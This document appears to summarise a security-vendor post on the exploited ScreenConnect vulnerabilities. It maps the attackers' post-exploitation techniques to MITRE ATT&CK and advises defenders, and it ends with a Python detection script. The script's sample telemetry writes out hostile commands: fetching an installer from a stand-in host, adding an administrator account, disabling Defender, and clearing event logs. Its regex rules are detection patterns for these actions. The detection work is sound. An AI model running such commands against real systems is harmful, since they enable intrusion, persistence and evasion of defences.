Response to ScreenConnect’s Zero-day Vulnerability

ConnectWise disclosed two critical ScreenConnect vulnerabilities (CVE-2024-1708 path traversal and CVE-2024-1709 authentication bypass) that were actively exploited in a campaign dubbed “SlashAndGrab,” enabling unauthorized access and ransomware deployment by multiple groups. AttackIQ released an assessment template that emulates the post-exploitation TTPs observed in these incidents to help organizations validate detection and prevention controls.

Key points

  • Two vulnerabilities in ScreenConnect 23.9.8 (CVE-2024-1708 and CVE-2024-1709) allowed trivial exploitation to gain unauthorized access.
  • Threat actors exploited these flaws (named SlashAndGrab) to deploy ransomware families linked to Black Basta, LockBit, and Bl00dy.
  • AttackIQ created an assessment template that emulates post-exploitation TTPs observed in these attacks to validate security controls.
  • The template covers Execution, Persistence, Defense Evasion, Command and Control, and Discovery techniques mapped to MITRE ATT&CK.
  • Notable emulated techniques include msiexec and rundll32 proxy execution, startup autostart, scheduled tasks, WMI, account creation, Defender exclusions, event log clearing, SSH C2, and ingress tool transfer.
  • AttackIQ recommends prioritizing detection and mitigation for Rundll32 proxy execution and other high-risk techniques, and following ConnectWise patching/detection guidance first.

MITRE Techniques

  • [T1218.007] Msiexec – Executes a Windows Installer Package (MSI) via msiexec.exe to run adversary-controlled code (‘This scenario executes a Windows Installer Package (MSI) using the msiexec.exe utility.’)
  • [T1218.011] Rundll32 – Uses RunDll32 to load and invoke an export from a DLL to execute payloads (‘This scenario executes RunDll32 with an AttackIQ DLL and calls an export to mimic previously reported malicious activity.’)
  • [T1547.001] Startup Folder – Achieves persistence by placing a LNK in the Startup folder to run at next logon (‘This scenario creates a LNK file in this directory that would execute at next logon for all users.’)
  • [T1053.005] Scheduled Task – Creates scheduled tasks via schtasks to maintain persistence and schedule actions (‘This scenario creates a new scheduled task using the schtasks utility.’)
  • [T1047] Windows Management Instrumentation – Uses WMI to launch executables or commands when event consumers trigger actions (‘WMI can be used to launch an executable or command when a common event consumer is triggered.’)
  • [T1136.001] Create Account: Local Account – Adds local user accounts via net user to retain access (‘This scenario creates a new account using net user to ensure persistence in the system.’)
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Modifies Microsoft Defender settings and exclusions (e.g., Add-MpPreference and Set-MpPreference) to evade detection (‘This scenario uses the Add-MpPreference cmdlet to add a directory to the exclusion list in Microsoft Defender.’; ‘This scenario uses the Set-MpPreference cmdlet to modify the DisableRealtimeMonitoring in Microsoft Defender.’)
  • [T1078.003] Valid Accounts: Local Accounts – Attempts to add users to the local Administrators group using net localgroup to escalate privileges (‘This scenario will attempt to add a local user to a local Administrators group using the net localgroup command.’)
  • [T1070.001] Indicator Removal: Clear Windows Event Logs – Removes evidence by clearing event logs with wevtutil.exe (‘The scenario will use the wevtutil.exe binary to clear event logs from the system.’)
  • [T1021.004] Remote Services: SSH – Establishes outbound SSH connections to external servers for C2/exfiltration testing (‘This scenario will initiate an SSH connection to an external AttackIQ-hosted server to exercise restrictions in outbound traffic.’)
  • [T1105] Ingress Tool Transfer – Downloads payloads to memory and disk to test delivery and endpoint controls (‘This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.’)
  • [T1018] Remote System Discovery – Searches for other domain computers and domain controllers using net group and nltest to map the environment (‘This scenario will search for other domain computers using the net group command.’ / ‘This scenario executes the nltest command to gather a list of domain controllers associated with a domain.’)
  • [T1069] Permission Groups Discovery – Enumerates permission groups with net group /domain to identify privileged accounts (‘This scenario will enumerate permission groups using the net group /domain command.’)
  • [T1482] Domain Trust Discovery – Calls nltest /trusted_domains to list trusted Active Directory domains tied to the host (‘This scenario calls the native nltest utility with the /trusted_domains option to retrieve a list of trusted Active Directory domains associated with this host.’)

Indicators of Compromise

  • [File names / Binaries] Commands and utilities used in scenarios – msiexec.exe, rundll32.exe, and other utilities such as wevtutil.exe and schtasks.exe.
  • [Command-line artifacts] Account and group manipulation commands – net user, net localgroup (used to create accounts and add users to Administrators).
  • [Software / Version] Affected product/version – ScreenConnect 23.9.8 (vulnerable to CVE-2024-1708 and CVE-2024-1709).
  • [URLs / Domains] Source and reference links in the article – https://www.attackiq.com/2024/03/08/response-to-screenconnects-zero-day-vulnerability/, and related media on youtube.com (context: reporting and supplemental content).

Attackers exploited trivial path traversal and authentication-bypass flaws in ScreenConnect 23.9.8 to gain access, after which operators executed a range of post-exploitation actions. The observed TTPs include proxy execution of payloads via msiexec and rundll32, creating persistence through the Startup folder and scheduled tasks, using WMI for execution, creating local accounts, and changing Defender preferences to add exclusions or disable real-time monitoring. Operators also removed evidence by clearing event logs and performed discovery (net group, nltest, GetCurrentDomain) to map AD and permission groups.

The AttackIQ assessment template models these behaviors across Execution, Persistence, Defense Evasion, Command and Control, Discovery, and Ingress Tool Transfer to validate detection and prevention pipelines. Scenarios exercise delivery methods (download-to-memory and save-to-disk), test outbound restrictions via SSH, and produce typical command-line artifacts (net user, net localgroup, schtasks, wevtutil). The template thus provides deterministic ways to test whether controls detect proxy loading via rundll32/msiexec, Defender exclusion changes, scheduled-task persistence, event log clearing, and AD discovery techniques.

For defenders, prioritize applying ConnectWise patches and guidance, then validate detections for rundll32/msiexec proxy execution (look for unusual command-line paths, temporary directories, and export names), monitor for changes to Defender preferences and exclusions, detect creation of local accounts and scheduled tasks, and alert on event log clearing. Use the AttackIQ template to exercise these detections and iterate on rules, telemetry collection, and response playbooks to close gaps exposed by SlashAndGrab-style exploitation.
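As an added example (not AttackIQ's template or code), the following Python hunts process-creation telemetry for the command-line artifacts the technique list above describes, flagging proxy execution only when the payload comes from a temp path or URL so that routine rundll32/msiexec use stays quiet. The rule set, the pipe-delimited record layout, and the sample log lines are all constructed here.

```python
"""Hunt for SlashAndGrab-style post-exploitation command lines in process-creation
telemetry. Rules, record format and sample records are constructed for this example
(hypothetical detection logic, not AttackIQ's scenarios)."""
import re

RULES = {  # label: (MITRE technique, regex applied to the full command line)
    "defender-exclusion":     ("T1562.001", r"Add-MpPreference\s+-ExclusionPath\b"),
    "defender-realtime-off":  ("T1562.001", r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$?true\b"),
    "local-account-created":  ("T1136.001", r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b"),
    "added-to-admins":        ("T1078.003", r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b"),
    "schtask-created":        ("T1053.005", r"\bschtasks(?:\.exe)?\s+/create\b"),
    "eventlog-cleared":       ("T1070.001", r"\bwevtutil(?:\.exe)?\s+cl\s+\S+"),
    # Proxy execution counts only when the payload sits in a user-writable path or a URL;
    # rundll32/msiexec on system DLLs and packages is everyday noise.
    "rundll32-temp-payload":  ("T1218.011", r"\brundll32(?:\.exe)?\s+\S*\\(?:temp|appdata|programdata|users\\public)\\"),
    "msiexec-remote-or-temp": ("T1218.007", r"\bmsiexec(?:\.exe)?\s.*?(?:https?://|\\temp\\)"),
}
COMPILED = [(label, tech, re.compile(rx, re.I)) for label, (tech, rx) in RULES.items()]

def classify(cmdline):
    """Return (technique, label) for the first matching rule, or None when benign."""
    for label, tech, pat in COMPILED:
        if pat.search(cmdline):
            return tech, label
    return None

def hunt(records):
    """records are 'time|parent_image|command_line'; returns one dict per hit."""
    hits = []
    for rec in records:
        ts, parent, cmdline = rec.split("|", 2)
        verdict = classify(cmdline)
        if verdict:
            # A ScreenConnect service as parent is where the observed chains start.
            hits.append({"ts": ts, "technique": verdict[0], "label": verdict[1], "parent": parent,
                         "from_screenconnect": "screenconnect" in parent.lower()})
    return hits

# Constructed telemetry: six records mirroring the scenarios above, two benign.
SAMPLE = [
    "10:01|ScreenConnect.ClientService.exe|rundll32.exe C:\\Windows\\Temp\\ssl.dll,Start",
    "10:02|ScreenConnect.ClientService.exe|msiexec.exe /q /i http://example.invalid/pkg.msi",
    "10:03|cmd.exe|net user backup1 P@ssw0rd1 /add",
    "10:03|cmd.exe|net localgroup administrators backup1 /add",
    "10:04|powershell.exe|Set-MpPreference -DisableRealtimeMonitoring $true",
    "10:05|cmd.exe|wevtutil.exe cl Security",
    "10:06|explorer.exe|C:\\Windows\\System32\\rundll32.exe shell32.dll,Control_RunDLL",
    "10:07|services.exe|msiexec.exe /V",
]
```

Running `hunt(SAMPLE)` yields six hits in order, the first two attributed to the ScreenConnect service parent; the two benign records produce nothing.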

Read more: https://www.attackiq.com/2024/03/08/response-to-screenconnects-zero-day-vulnerability/